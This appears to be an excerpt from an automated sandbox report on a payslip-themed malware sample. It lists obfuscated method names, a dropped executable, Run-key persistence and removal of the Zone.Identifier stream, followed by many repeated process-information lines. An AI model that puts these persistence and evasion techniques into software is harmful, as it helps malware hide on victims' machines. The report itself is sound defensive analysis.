                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, JtgxviEHqAVBfiVUqo.csHigh entropy of concatenated method names: 'sZEE5lR5aX', 'dfSE08uubG', 'dVlEqM3KVs', 'OxOEBhbNZh', 'IFREx7G5kZ', 'hvPEj0G5uS', 'nioEaTQVDD', 'qPDE2k5qI5', 'wVAEyWKAvu', 'uBdEdn78T1'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, Ch05sqFX3Aubk9xB4p.csHigh entropy of concatenated method names: 'FCc1u6lI3', 'QFw4hknU2', 'KFBZKVvLI', 'ckVY9de2D', 'Hb7Pl8pNH', 'yba73nt1Q', 'E4m05K9cv3cxpnJic0', 'TblDBx4OV4fuxbSZTR', 'iXEwU8hZ0', 'trjSu4ytp'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, jISFqKQcEGnl9VxDF7c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WiwS55lptS', 'HJfS00gDFL', 'qr8Sq7ujnT', 'sf2SB9NsLk', 'Y8NSxAhE9x', 'dorSjWIIoC', 'bdtSahyECY'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, HN6XVpWTft3o9XfQII.csHigh entropy of concatenated method names: 'U2sv9irhfq', 'bOrvKW2KdL', 'p6sv1kmK83', 'raav4JOUjr', 'QnhvLJ5I8r', 'EA3vZWFKVe', 'eTKvYaFa36', 'SLFvRY5Urc', 'coyvPN6bav', 'xq6v72sKyN'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, NQPnxCfo1CRN0qghcA.csHigh entropy of concatenated method names: 'fVhU43aet3', 'hn6UZSnluS', 'vS1UR7iBWS', 'H4HUPYIHuN', 'UKmUp2Px2y', 'L2xUIFNosM', 'KbvUhU2Lxk', 'YsWUwYZS8C', 'Ef0Uk8CT64', 'DpOUSh2AKN'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, Rfvy73RNcDOBpBaxNd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xdNWytBhVT', 'ypIWdVWdb3', 'UIdWzTCAvW', 'gnMoFBagO1', 'A7toC6Tayh', 'F7joWip5vx', 'U1eooQ4AkJ', 'fnAwAp2g2cnDhnxDtEj'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, DgUsN990etBSRMLxhH.csHigh entropy of concatenated method names: 'a7HCv8qHCN', 'oXQCcB0S6p', 'V3uCVSXCw1', 'LVeC6FitA9', 'tCACpfKmwE', 'l4nCIjkxDO', 'fu2Y81DmBbjh2ZseTt', 'jlWdZTnsiFfp0kPRm3', 'FDOCCtdETx', 'uj5CoF8pwS'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, sVKoWRX5WMDJnH7n58.csHigh entropy of concatenated method names: 'Dispose', 'sF9CyBoEqo', 'RbHWGQ5VtT', 'rlObbOZZEe', 'qgACdOB0tE', 'HrdCzMKnNF', 'ProcessDialogKey', 'ci1WFEcKgT', 'xy6WCKHPFI', 'LtWWW3TaFh'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, sSWcByxnZSUy4blmvn.csHigh entropy of concatenated method names: 'QdxuL0P6sO', 'v50uY6Z1sW', 'skRUAR3hbf', 'GgOUeGB2Je', 'CdoUHXMvEB', 'qPxUDhHxpQ', 'JEUUNvWUw4', 'PkmUXPZP8p', 'eXOUrhNb0R', 'xCDU38tEfK'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, MFjli4i26IqfK4LJyO.csHigh entropy of concatenated method names: 'LTDw8bpp3y', 'EfOwGHWPZv', 'YN3wA5U0B1', 'b9hwe37Ofb', 'GAFw5tiub3', 'tGjwHX5SiQ', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, sUNrtITWEK7M5KbaEr.csHigh entropy of concatenated method names: 'AgDwJNr5UJ', 'x49wEJMcIk', 'xIrwUQ1e6l', 'gqiwuNx0U9', 'DjiwOa3pwh', 'yS2wvlI4wZ', 'VHiwcCDu3N', 'Cl0wMoUj0D', 'TJcwVckcmL', 'Bgdw6cQaob'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, x2vbuUlZycmUohNT1t.csHigh entropy of concatenated method names: 'ddrhVr4yvJ', 'Ownh6WVNbK', 'ToString', 'B2qhJXtKH7', 'DRthE4XHcc', 'kkNhUv7mQZ', 'FG3huH5SNq', 'DKHhO7I0VY', 'POIhv4LlYb', 'KCxhcUhMFS'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, REJQY251dpiIYPqPA5.csHigh entropy of concatenated method names: 'ToString', 'HN9IThy04Z', 'jBqIGiaXn4', 'wRoIA6EbYu', 'qIEIeQmCjd', 'PXXIH9XGGQ', 'SA3ID0Fsd5', 'Hn3INKyw79', 'RNwIXaUwvq', 'mCuIreFSxi'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, ABEcdmQVHbnUnAcSWbO.csHigh entropy of concatenated method names: 'shZk9AAxrY', 'CnPkKpEE7l', 'Tudk1dYBg6', 'iAtk45ibvy', 'XNokLm718B', 'hANkZEhElZ', 'yEWkYacEBJ', 'EVskRpkKau', 'K0hkPGUGl3', 'VuAk7FAf4x'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, Wdqh4YHsV3Mn1INqWs.csHigh entropy of concatenated method names: 'XCfkCpFMfd', 'WpJko2vsBc', 'QdWkfNVm6R', 'FMrkJgo9s2', 'J2RkEMSbiB', 'IZukuvMEUk', 'PB7kOMiWAt', 'O5Xwai4RgU', 'kTmw2adCrb', 'iVawy3JN8T'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, agoGtyndP1pwLYdQa9.csHigh entropy of concatenated method names: 'M8MsRiptO5', 'sfTsP1QcVP', 'B8ys8f34DM', 'zwxsGy77mI', 'gSnsedIDJ3', 'Ma8sHRjHik', 'DQAsNMQXMD', 'g1NsX6dQi1', 'uxZs33b1th', 'meIsTWFmEi'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.csHigh entropy of concatenated method names: 'gIUogv3WcE', 'LP1oJ0Q3VT', 'cDcoEsfxM1', 'EDToU5AXy5', 'Yexou9oOKO', 'l6qoOWTad0', 'LPBovlEaQO', 'VvWoc4MV4q', 'wQHoMSU6HD', 'iuFoVZxN2L'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, Fm7q2vj6F9GunoTToo.csHigh entropy of concatenated method names: 'jF3shtIp5LHhSfMyud7', 'BcPuRaIMuFV8hgidAve', 'Eq1Owaj3wm', 'Jl0OkeHJZy', 'tNpOSSNUCT', 'ssDARfIuvZuga5loN99', 'ClF97HIy2gg5vmWlZK4', 'xOZIQPIONnHnPDUaI9R'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, eEeKH8J1F80vEqjkp3.csHigh entropy of concatenated method names: 'YtKp3YAb0v', 'kECpllihCr', 'vGfp5kuFVi', 'YK6p0cnK2D', 'OqmpGSg1W8', 'uJkpAxDLNB', 'vFipevduUj', 'aJlpHTrhhw', 'bM1pDrLTx1', 'F0ipN73VkK'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, UcjqhEsE3U81Clq3ih.csHigh entropy of concatenated method names: 'fLmh2VXB11', 'E7UhdKDUbk', 'XXkwFnU5T9', 'ecKwCMifNV', 'HHchTwjhkL', 'iMlhlxOtDR', 'yw5ht1LpiF', 'sykh5BIFec', 'sWmh09qCBP', 'V9XhqHRDDQ'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, HOlZdbzCMMJ2SOspob.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cf4ksxMoOL', 'NLikpPM6Te', 'QDQkIpdjXv', 'CXNkh9mOfL', 'A8ckwke9Fv', 'hu9kk8cYVB', 'A4ekSZYbRM'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, Fa89rlUO37apgMnjGO.csHigh entropy of concatenated method names: 'MkhOgeUyxm', 'OO5OEFP16t', 'fuWOuIDnDK', 'KokOvUf8lS', 'JyXOcf1jaU', 'gTcuxceDkn', 'cbRujwgdVq', 'aWXuaPiiTW', 'Taiu2BjGM0', 'LvLuyOHfpC'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, JtgxviEHqAVBfiVUqo.csHigh entropy of concatenated method names: 'sZEE5lR5aX', 'dfSE08uubG', 'dVlEqM3KVs', 'OxOEBhbNZh', 'IFREx7G5kZ', 'hvPEj0G5uS', 'nioEaTQVDD', 'qPDE2k5qI5', 'wVAEyWKAvu', 'uBdEdn78T1'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, Ch05sqFX3Aubk9xB4p.csHigh entropy of concatenated method names: 'FCc1u6lI3', 'QFw4hknU2', 'KFBZKVvLI', 'ckVY9de2D', 'Hb7Pl8pNH', 'yba73nt1Q', 'E4m05K9cv3cxpnJic0', 'TblDBx4OV4fuxbSZTR', 'iXEwU8hZ0', 'trjSu4ytp'
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
